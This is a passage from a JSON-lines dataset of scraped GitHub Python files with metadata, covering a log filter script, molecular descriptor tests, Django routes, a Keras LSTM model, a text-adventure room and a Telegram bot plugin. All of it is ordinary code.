"name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 125, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 158, "usage_type": "call"}, {"api_name": "seaborn.boxplot", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}]}
+{"seq_id": "31795921740", "text": "import json\r\nimport sys\r\n\r\nwith open('./activity_log_full', 'r') as f:\r\n logs = json.load(f)\r\n\r\nuser = sys.argv[1]\r\nprint(user)\r\nfor i in logs:\r\n if i['caller'] == user:\r\n print('The caller is ', user)\r\n print(json.dumps(i['authorization']['action'], indent=4))\r\n\r\n\t\r\n", "repo_name": "ozendorf/sobek", "sub_path": "used_actions.py", "file_name": "used_actions.py", "file_ext": "py", "file_size_in_byte": 286, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "json.load", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "74880259930", "text": "import tempfile\nimport unittest as ut\n\nimport datamol as dm\nimport joblib\nimport numpy as np\nimport pytest\n\nfrom molfeat.calc import (\n CATS,\n ElectroShapeDescriptors,\n RDKitDescriptors2D,\n RDKitDescriptors3D,\n ScaffoldKeyCalculator,\n USRDescriptors,\n MordredDescriptors,\n)\nfrom molfeat.calc.skeys import skdistance\n\nfrom molfeat.utils import requires\n\n\nclass TestDescPharm(ut.TestCase):\n r\"\"\"Test cases for descriptors and pharmacophore generation\"\"\"\n smiles = [\n \"CCOc1c(OC)cc(CCN)cc1OC\",\n \"COc1cc(CCN)cc(OC)c1OC\",\n \"C[C@@H]([NH3+])Cc1c2ccoc2c(Br)c2ccoc12\",\n ]\n EXTRA_LARGE_MOL = \"CC(C)CC(NCCNC(=O)C(CCC(O)=O)NC(C)=O)C(=O)NC(Cc1ccc(O)cc1)C(=O)NC(CC(C)C)C(=O)NC(C(C)C)C(=O)NC(C)C(=O)NCC(=O)NC(CCC(O)=O)C(=O)NC(CCCNC(N)=N)C(=O)NCC(=O)NC(Cc1ccccc1)C(=O)NC(Cc1ccccc1)C(=O)NC(Cc1ccc(O)cc1)C(=O)NC(C(C)O)C(=O)N1CCCC1C(=O)NC(C)C(O)=O\"\n\n @pytest.mark.xfail(not requires.check(\"mordred\"), reason=\"3rd party module mordred is missing\")\n def test_mordred(self):\n calc = MordredDescriptors()\n fps = calc(self.smiles[0])\n self.assertEqual(len(fps), len(calc))\n\n def test_rdkit2d(self):\n calc = RDKitDescriptors2D()\n fps = calc(self.smiles[0])\n self.assertEqual(len(fps), len(calc))\n\n sm = \"CC[C@@H]1[C@@H]2C[C@H](O)CC[C@]2(C)[C@H]2CC[C@@]3(C)[C@@H](CC[C@@H]3[C@H](C)CCOS(=O)(=O)O[Na])[C@@H]2[C@@H]1O\"\n sm_disconnected = \"CC[C@@H]1[C@@H]2C[C@H](O)CC[C@]2(C)[C@H]2CC[C@@]3(C)[C@@H](CC[C@@H]3[C@H](C)CCOS(=O)(=O)[O-])[C@@H]2[C@@H]1O.[Na+]\"\n # force sanitization would return same descriptors for both of this\n fps = calc(sm)\n fps2 = calc(sm_disconnected)\n np.testing.assert_allclose(fps, fps2)\n # with the fix we should not have any value that is nan after sanitization\n # neither for Charge related or BCut2D properties\n self.assertFalse(np.isnan(fps).any())\n\n # we should have nan values at all bcut columns\n # if we do not standardize\n calc_nan = RDKitDescriptors2D(do_not_standardize=True)\n fps = calc_nan(sm)\n bcut_cols = [i for i, x in enumerate(calc.columns) if \"bcut\" in x.lower()]\n self.assertTrue(np.isnan(fps[bcut_cols]).all())\n\n def test_rdkit2d_large_mol_no_ipc(self):\n # sanity check for large molecules that will hang forerever\n calc = RDKitDescriptors2D(ignore_descrs=[\"Ipc\", \"AvgIpc\"])\n fps = calc(self.EXTRA_LARGE_MOL)\n self.assertEqual(len(fps), len(calc))\n\n def test_rdkit3d(self):\n calc = RDKitDescriptors3D()\n mol = dm.conformers.generate(dm.to_mol(self.smiles[0]))\n fps = calc(mol)\n self.assertEqual(len(fps), len(calc))\n\n def test_cats_2d(self):\n smiles = \"Nc1cnn(-c2ccccc2)c(=O)c1Cl\"\n mol = dm.to_mol(smiles)\n\n calc = CATS(max_dist=5, scale=\"raw\", use_3d_distances=False)\n assert calc(mol).shape == (126,)\n\n def test_cats_3d_missing_conformer(self):\n smiles = \"Nc1cnn(-c2ccccc2)c(=O)c1Cl\"\n mol = dm.to_mol(smiles)\n\n calc = CATS(max_dist=5, scale=\"raw\", use_3d_distances=True)\n\n with pytest.raises(ValueError):\n calc(mol)\n\n def test_cats_3d(self):\n smiles = \"Nc1cnn(-c2ccccc2)c(=O)c1Cl\"\n mol = dm.to_mol(smiles)\n mol = dm.conformers.generate(mol)\n\n calc = CATS(max_dist=5, scale=\"raw\", use_3d_distances=True)\n assert calc(mol).shape == (126,)\n\n def test_cats_pickle(self):\n smiles = \"Nc1cnn(-c2ccccc2)c(=O)c1Cl\"\n mol = dm.to_mol(smiles)\n\n calc = CATS(max_dist=5, scale=\"raw\", use_3d_distances=False)\n\n # compute fp\n fp1 = calc(mol)\n\n fpath = tempfile.NamedTemporaryFile().name\n\n # pickle\n joblib.dump(calc, fpath)\n\n # unpickle\n calc = 
joblib.load(fpath)\n\n # compute fp\n fp2 = calc(mol)\n\n # check\n assert np.allclose(fp1, fp2)\n\n def test_shape_descriptors(self):\n calc = USRDescriptors(\"usrcat\")\n with self.assertRaises(ValueError):\n calc(self.smiles[0])\n mol_with_conf = dm.conformers.generate(dm.to_mol(self.smiles[0]))\n out = calc(mol_with_conf)\n self.assertEqual(out.shape[-1], len(calc))\n\n calc2 = ElectroShapeDescriptors(\"mmff94\")\n out2 = calc2(mol_with_conf)\n self.assertEqual(out2.shape[-1], len(calc2))\n\n def test_scaffkey(self):\n calc = ScaffoldKeyCalculator()\n fps = calc(self.smiles[0])\n columns = calc.columns\n col_to_check = [\n \"n_atom_in_rings\",\n \"n_nitrogen\",\n \"n_heteroatoms\",\n \"n_ring_system\",\n \"n_carbon_het_carbon_het_bonds\",\n ]\n expected_output = [6, 1, 4, 1, 2]\n comp_res = [fps[columns.index(x)] for x in col_to_check]\n self.assertEqual(expected_output, comp_res)\n\n def test_scaff_skdist(self):\n calc = ScaffoldKeyCalculator()\n smiles = dm.freesolv()[\"smiles\"][:10].tolist()\n fps = [calc(x) for x in smiles]\n fps1 = np.asarray(fps[:6])\n fps2 = np.asarray(fps[6:])\n # compute batch\n pairwise_dist = skdistance(fps1, fps2, cdist=True)\n # compute singletons\n dist = []\n for i in range(fps2.shape[0]):\n dist.append(skdistance(fps[0], fps2[i, :], cdist=False))\n\n np.testing.assert_allclose(np.asarray(dist), pairwise_dist[0, :])\n\n\nif __name__ == \"__main__\":\n ut.main()\n", "repo_name": "datamol-io/molfeat", "sub_path": "tests/test_descriptors.py", "file_name": "test_descriptors.py", "file_ext": "py", "file_size_in_byte": 5458, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 131, "dataset": "github-code", "pt": "32", "api": [{"api_name": "unittest.TestCase", "line_number": 23, "usage_type": "attribute"}, {"api_name": "molfeat.calc.MordredDescriptors", "line_number": 34, "usage_type": "call"}, {"api_name": "pytest.mark.xfail", "line_number": 32, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 32, "usage_type": "attribute"}, {"api_name": "molfeat.utils.requires.check", "line_number": 32, "usage_type": "call"}, {"api_name": "molfeat.utils.requires", "line_number": 32, "usage_type": "name"}, {"api_name": "molfeat.calc.RDKitDescriptors2D", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 51, "usage_type": "call"}, {"api_name": "molfeat.calc.RDKitDescriptors2D", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 58, "usage_type": "call"}, {"api_name": "molfeat.calc.RDKitDescriptors2D", "line_number": 62, "usage_type": "call"}, {"api_name": "molfeat.calc.RDKitDescriptors3D", "line_number": 67, "usage_type": "call"}, {"api_name": "datamol.conformers.generate", "line_number": 68, "usage_type": "call"}, {"api_name": "datamol.conformers", "line_number": 68, "usage_type": "attribute"}, {"api_name": "datamol.to_mol", "line_number": 68, "usage_type": "call"}, {"api_name": "datamol.to_mol", "line_number": 74, "usage_type": "call"}, {"api_name": "molfeat.calc.CATS", "line_number": 76, "usage_type": "call"}, {"api_name": "datamol.to_mol", "line_number": 81, "usage_type": "call"}, {"api_name": "molfeat.calc.CATS", "line_number": 83, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 85, "usage_type": "call"}, {"api_name": "datamol.to_mol", "line_number": 90, "usage_type": "call"}, {"api_name": 
"datamol.conformers.generate", "line_number": 91, "usage_type": "call"}, {"api_name": "datamol.conformers", "line_number": 91, "usage_type": "attribute"}, {"api_name": "molfeat.calc.CATS", "line_number": 93, "usage_type": "call"}, {"api_name": "datamol.to_mol", "line_number": 98, "usage_type": "call"}, {"api_name": "molfeat.calc.CATS", "line_number": 100, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 105, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 108, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 117, "usage_type": "call"}, {"api_name": "molfeat.calc.USRDescriptors", "line_number": 120, "usage_type": "call"}, {"api_name": "datamol.conformers.generate", "line_number": 123, "usage_type": "call"}, {"api_name": "datamol.conformers", "line_number": 123, "usage_type": "attribute"}, {"api_name": "datamol.to_mol", "line_number": 123, "usage_type": "call"}, {"api_name": "molfeat.calc.ElectroShapeDescriptors", "line_number": 127, "usage_type": "call"}, {"api_name": "molfeat.calc.ScaffoldKeyCalculator", "line_number": 132, "usage_type": "call"}, {"api_name": "molfeat.calc.ScaffoldKeyCalculator", "line_number": 147, "usage_type": "call"}, {"api_name": "datamol.freesolv", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 151, "usage_type": "call"}, {"api_name": "molfeat.calc.skeys.skdistance", "line_number": 153, "usage_type": "call"}, {"api_name": "molfeat.calc.skeys.skdistance", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 159, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 159, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 163, "usage_type": "call"}]}
+{"seq_id": "25158365656", "text": "from django.urls import path\nfrom . import views\n\n\n\nurlpatterns = (path('login/', views.login),\n path('consent/', views.consent),\n path('instructions/', views.instructions),\n path('decision/', views.decision),\n path('question/', views.question),\n path('feedback/', views.feedback),\n\n )\n", "repo_name": "ErikOSorensen/mmrisk_instrument", "sub_path": "mmr2web/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}]}
+{"seq_id": "36753279681", "text": "\nfrom keras.utils import np_utils\nfrom keras.models import Sequential, Model \nfrom keras.layers import Input, Dense , LSTM, Conv2D, Flatten, MaxPool2D, Dropout, BatchNormalization\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard\n\nfrom sklearn.datasets import load_diabetes\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler\n\nimport matplotlib.pyplot as plt \nimport numpy as np\n\n\ndiabetes = load_diabetes()\nx, y = diabetes.data, diabetes.target\n\n\n# print(x.shape) # (442, 10)\n# print(y.shape) # (442, )\nprint(x[0])\nprint(\"===================\")\n\n\nx = x[:, 0:4]\n\nprint(x[0]) # [[0.03807591 0.05068012 0.06169621 0.02187235]]\n\nx = np.round(x,4)\n\nprint(x[0]) # [0.0381 0.0507 0.0617 0.0219]\nprint(y[0]) \nprint(x.shape) # (442, 4)\n\n\n#####################################\n\nstandard_scaler = StandardScaler() \n\n# x = standard_scaler.fit_transform(x)\n\n\nrobust_scaler = RobustScaler()\n\nx = robust_scaler.fit_transform(x)\n\n####################################\n\nprint(x.shape)\n\nx = x.reshape(442,4,1)*100\n\n\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(\n \n x, y, shuffle = True , train_size = 0.8 \n)\n\n\n\n\n# 모델 \n\nmodel = Sequential()\nmodel.add(LSTM(32, activation='relu', input_shape = (4,1)))\nmodel.add(Dense(16, activation= 'relu')) \nmodel.add(Dense(32, activation= 'relu' )) \nmodel.add(Dropout(0.2))\n\n\nmodel.add(Dense(64, activation= 'relu')) \nmodel.add(Dense(64, activation= 'relu')) \nmodel.add(Dense(64, activation= 'relu')) \nmodel.add(Dropout(0.2))\n\nmodel.add(Dense(64, activation= 'relu')) \nmodel.add(Dense(64, activation= 'relu')) \nmodel.add(Dense(64, activation= 'relu')) \nmodel.add(Dropout(0.2))\n\n\nmodel.add(Dense(32, activation= 'relu')) \nmodel.add(Dense(16, activation= 'relu')) \nmodel.add(Dense(16, activation= 'relu')) \nmodel.add(Dropout(0.2))\n\nmodel.add(Dense(1, activation= 'relu')) \n\n\n# 3. 
컴파일, 훈련\n\nfrom keras.callbacks import EarlyStopping \nfrom keras.optimizers import Adam\n\nearly_stopping = EarlyStopping( monitor='loss', patience= 10, mode ='auto')\n\nmodel.compile(loss='mse', optimizer= Adam (lr=0.001, beta_1=0.9, beta_2=0.999), metrics=['mse'])\n\nhist = model.fit(x_train,y_train, epochs= 1000, batch_size= 2, validation_split= 0.2)\n\n\n\n# 평가 및 예측 \n\n\nloss, mse = model.evaluate(x_test,y_test, batch_size=1)\n\n\nprint('loss :', loss)\nprint('mse : ', mse)\n\n\ny_pred = model.predict(x_test)\n\nfrom sklearn.metrics import r2_score\nr2 = r2_score(y_test,y_pred)\n\nprint(\"R2 score : \", r2)\n\n\n'''\n\nloss : 3880.6124057280886\nmse : 3880.61279296875\nR2 score : 0.40212287079390385\n\n\n'''", "repo_name": "votus777/AI_study", "sub_path": "keras/keras80_diabets_LSTM.py", "file_name": "keras80_diabets_LSTM.py", "file_ext": "py", "file_size_in_byte": 2672, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sklearn.datasets.load_diabetes", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.RobustScaler", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 56, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 66, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 67, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 69, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 70, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 74, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 76, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 78, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 79, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 80, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 81, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 85, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 86, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 87, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 89, "usage_type": "call"}, {"api_name": "keras.callbacks.EarlyStopping", "line_number": 97, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 99, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "39627818985", "text": "import spatial\nimport art\nimport player\nimport query\n\ndef sweptaway(player_obj):\n\tprint('')\n\tart.display(\"sweptaway\")\n\tprint('#'*100)\n\tprint(\"You've been swept away!\")\n\tplayer_obj.kill()\n\ndef enter(player_obj, space_obj):\n\tart.display(\"river\")\n\tprint('#'*100)\n\tprint('You are on the edge of a river, it is unsafe to cross.')\n\twhile True:\n\t\tq = input('What would you like to do? ')\n\t\terr, rtext = query.parse_movement(q)\n\t\tif err == False:\n\t\t\tif rtext == 'forward' or rtext == 'right' or rtext == 'left':\n\t\t\t\tsweptaway(player_obj)\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tplayer_obj.move(rtext)\n\t\t\t\tbreak\n\ndef init():\n\triverspace = spatial.space()\n\triverspace.name = \"river\"\n\triverspace.enter = enter\n\tart.load(\"river\", \"content/river.ansi\")\n\tart.load(\"sweptaway\", \"content/sweptaway.ansi\")\n\treturn riverspace", "repo_name": "tomlister/SDDIST-Exemplars", "sub_path": "chooseyourownadventure/content/river.py", "file_name": "river.py", "file_ext": "py", "file_size_in_byte": 790, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "art.display", "line_number": 8, "usage_type": "call"}, {"api_name": "art.display", "line_number": 14, "usage_type": "call"}, {"api_name": "query.parse_movement", "line_number": 19, "usage_type": "call"}, {"api_name": "spatial.space", "line_number": 29, "usage_type": "call"}, {"api_name": "art.load", "line_number": 32, "usage_type": "call"}, {"api_name": "art.load", "line_number": 33, "usage_type": "call"}]}
+{"seq_id": "9266722409", "text": "from pyrogram import Client, filters\nfrom pyrogram.types import (CallbackQuery, InlineKeyboardButton,\n InlineKeyboardMarkup, Message)\n\nfrom TelegramBot import bot\nfrom TelegramBot.helpers.start_constants import *\nfrom TelegramBot.config import OWNER_USERID, SUDO_USERID\nfrom TelegramBot.database import database\nfrom TelegramBot.helpers.decorators import ratelimiter\n\nSTART_BUTTON = [\n [\n InlineKeyboardButton(\"📖 Commands\", callback_data=\"COMMAND_BUTTON\"),\n InlineKeyboardButton(\"👨💻 About me\", callback_data=\"ABOUT_BUTTON\"),\n ],\n [\n InlineKeyboardButton(\n \"🔭 Original Repo\",\n url=\"https://github.com/sanjit-sinha/TelegramBot-Boilerplate\",\n )\n ],\n]\n\n\nCOMMAND_BUTTON = [\n [\n InlineKeyboardButton(\"Users\", callback_data=\"USER_BUTTON\"),\n InlineKeyboardButton(\"Sudo\", callback_data=\"SUDO_BUTTON\"),\n ],\n [InlineKeyboardButton(\"Developer\", callback_data=\"DEV_BUTTON\")],\n [InlineKeyboardButton(\"🔙 Go Back\", callback_data=\"START_BUTTON\")],\n]\n\n\nGOBACK_1_BUTTON = [[InlineKeyboardButton(\"🔙 Go Back\", callback_data=\"START_BUTTON\")]]\nGOBACK_2_BUTTON = [[InlineKeyboardButton(\"🔙 Go Back\", callback_data=\"COMMAND_BUTTON\")]]\n\n\n@Client.on_message(filters.command([\"start\", \"help\"]))\n@ratelimiter\nasync def start(_, message: Message):\n await database.saveUser(message.from_user)\n return await message.reply_text(\n START_CAPTION,\n reply_markup=InlineKeyboardMarkup(START_BUTTON),\n quote=True)\n\n\n@Client.on_callback_query(filters.regex(\"_BUTTON\"))\n@ratelimiter\nasync def botCallbacks(_, CallbackQuery: CallbackQuery):\n\n clicker_user_id = CallbackQuery.from_user.id\n user_id = CallbackQuery.message.reply_to_message.from_user.id\n\n if clicker_user_id != user_id:\n return await CallbackQuery.answer(\"This command is not initiated by you.\")\n\n if CallbackQuery.data == \"SUDO_BUTTON\":\n if clicker_user_id not in SUDO_USERID:\n return await CallbackQuery.answer(\n \"You are not in the sudo user list.\", show_alert=True) \n await CallbackQuery.edit_message_text(\n SUDO_TEXT, reply_markup=InlineKeyboardMarkup(GOBACK_2_BUTTON))\n \n elif CallbackQuery.data == \"DEV_BUTTON\":\n if clicker_user_id not in OWNER_USERID:\n return await CallbackQuery.answer(\n \"This is developer restricted command.\", show_alert=True) \n await CallbackQuery.edit_message_text(\n DEV_TEXT, reply_markup=InlineKeyboardMarkup(GOBACK_2_BUTTON))\n \n if CallbackQuery.data == \"ABOUT_BUTTON\":\n await CallbackQuery.edit_message_text(\n ABOUT_CAPTION, reply_markup=InlineKeyboardMarkup(GOBACK_1_BUTTON))\n\n elif CallbackQuery.data == \"START_BUTTON\":\n await CallbackQuery.edit_message_text(\n START_CAPTION, reply_markup=InlineKeyboardMarkup(START_BUTTON))\n\n elif CallbackQuery.data == \"COMMAND_BUTTON\":\n await CallbackQuery.edit_message_text(\n COMMAND_CAPTION, reply_markup=InlineKeyboardMarkup(COMMAND_BUTTON))\n\n elif CallbackQuery.data == \"USER_BUTTON\":\n await CallbackQuery.edit_message_text(\n USER_TEXT, reply_markup=InlineKeyboardMarkup(GOBACK_2_BUTTON))\n await CallbackQuery.answer()\n\n\n@Client.on_message(filters.new_chat_members, group=1)\nasync def newChat(_, message: Message):\n \"\"\"\n Get notified when someone add bot in the group, then saves that group chat_id\n in the database.\n \"\"\"\n\n chatid = message.chat.id\n for new_user in message.new_chat_members:\n if new_user.id == bot.me.id:\n await database.saveChat(chatid)\n", "repo_name": "sanjit-sinha/TelegramBot-Boilerplate", "sub_path": 
"TelegramBot/plugins/users/start.py", "file_name": "start.py", "file_ext": "py", "file_size_in_byte": 3715, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 84, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 13, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 14, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 17, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 27, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 28, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 30, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 31, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 35, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 36, "usage_type": "call"}, {"api_name": "pyrogram.types.Message", "line_number": 41, "usage_type": "name"}, {"api_name": "TelegramBot.database.database.saveUser", "line_number": 42, "usage_type": "call"}, {"api_name": "TelegramBot.database.database", "line_number": 42, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 45, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 39, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 39, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 39, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 39, "usage_type": "name"}, {"api_name": "TelegramBot.helpers.decorators.ratelimiter", "line_number": 40, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 51, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.from_user", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 53, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.message", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 54, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.answer", "line_number": 57, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 57, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.data", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 59, "usage_type": "name"}, {"api_name": "TelegramBot.config.SUDO_USERID", "line_number": 60, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.answer", "line_number": 61, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 61, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.edit_message_text", "line_number": 63, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 63, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 64, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery.data", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 66, 